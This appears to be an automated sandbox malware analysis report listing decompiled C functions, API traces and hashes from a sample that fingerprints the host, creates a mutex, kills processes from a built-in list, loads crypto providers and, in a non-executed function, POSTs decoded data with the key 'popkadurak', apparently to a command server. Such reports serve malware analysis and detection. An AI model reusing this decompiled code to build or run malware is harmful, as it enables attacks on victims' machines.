Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
lstrcpyW.KERNEL32 ref: 0F58484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B

Strings

Global\, xrefs: 0F584849

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
Instruction ID: cdf7a54993bd3f3f5c11b4a493e5204001f3a608bd5b5e4e568676fe4fbc45d2
Opcode Fuzzy Hash: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
Instruction Fuzzy Hash: 23212371650712BBE124B724DC4AF7F7B5CEB80B11F600239BA05B61D1AA98790B8AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0F584A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F584A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
CloseHandle.KERNEL32(00000000), ref: 0F584AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0F584AEA

Strings

i)w, xrefs: 0F584A85

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 3573210778-1280834553
Opcode ID: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
Instruction ID: afc5d68616beee0a847f8aa24f2523bddbe59793893879677c402e05be8aec33
Opcode Fuzzy Hash: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
Instruction Fuzzy Hash: 7301FE32100102FFD710AF50AD85B5A77AEFF84712F314035FE09BA141D734981B9B95

Uniqueness

Uniqueness Score: -1.00%

Function 0F5835C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F5835C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0F5834F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F5835E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F583600
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F583616
GetFileSize.KERNEL32(00000000,00000000), ref: 0F583626
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F583639
ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0F58364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F58368D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F583694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5836A2

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
Instruction ID: e599193e7c4041a2befb8ab07b480e90e0128ce1b3f4c355849a55e32297ea98
Opcode Fuzzy Hash: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
Instruction Fuzzy Hash: 1121F931B403047BFB216BA99D86FAE7B68EB44B21F200069FB05BA3C1D7B895179754

Uniqueness

Uniqueness Score: -1.00%

Function 0F587D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F587D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E31

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
Instruction ID: a4cfbd202773137b3d5cac9fa628adb43f671732b21f4072b2ea178205ee5206
Opcode Fuzzy Hash: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
Instruction Fuzzy Hash: 3321D030240B04AAE6766A15DC06FA6B7E1BB44B05F75493CE2C2344F18BF5749ADF04

Uniqueness

Uniqueness Score: -1.00%

Function 0F587410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F587410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f587426
0x0f587430
0x0f587484
0x0f587432
0x0f587435
0x0f587447
0x0f58744f
0x0f587466
0x0f58746f
0x0f58747b
0x0f587451
0x0f587454
0x0f587457
0x0f587463
0x0f587463
0x0f58744f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587426
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587447
RegCloseKey.KERNELBASE(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587457
GetLastError.KERNEL32(?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587466
RegCloseKey.ADVAPI32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F58746F

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
Instruction ID: 5f62967033a2f304c42e657828e8f883623c85e2f16a5d1cc562925364204c76
Opcode Fuzzy Hash: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
Instruction Fuzzy Hash: FB01213260011DFBDB109F94ED05DDA7F68EB08362B104162FE05E6221D7329A35BBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0F586550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F586550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F5863E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f586553
0x0f586554
0x0f586565
0x0f58656e
0x0f58657f
0x0f586588
0x0f58658d
0x0f586597
0x0f5865b5
0x0f5865b9
0x0f5865c3
0x0f5865c8
0x0f5865c8
0x0f5865d2
0x0f5865df

APIs

VirtualAlloc.KERNELBASE(00000000,00000123,00003000,00000004,?,?,0F584B9E), ref: 0F586565
VirtualAlloc.KERNELBASE(00000000,00000515,00003000,00000004,?,0F584B9E), ref: 0F58657F

Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
Part of subcall function 0F5863E0: GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
Instruction ID: 3fa041b42630bf18f33f63427462cb35c558df6ff126a82b1f3e654db32ba0ff
Opcode Fuzzy Hash: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
Instruction Fuzzy Hash: 0E11F774A41208EBD704DF94CA95F99BBF5EB88705F208188E904AB381D7B5AF119B50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F5853D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0F5853D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0F585F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0F5833E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0F585350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0F587E40( &_v104);
						_v92 = E0F585220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xf58fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xf58fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xf58fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xf58fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xf58fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xf58fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0F588050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0F5853D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xf592a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xf592a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F58541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585492
HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854AD
HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854CD
GetLastError.KERNEL32(?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854DC
lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
lstrlenA.KERNEL32(00000000), ref: 0F5855B3
lstrlenW.KERNEL32(?), ref: 0F5855BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
InternetCloseHandle.WININET(0F58581B), ref: 0F585657

Strings

POST, xrefs: 0F5855CA
popkadurak, xrefs: 0F5855E9

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
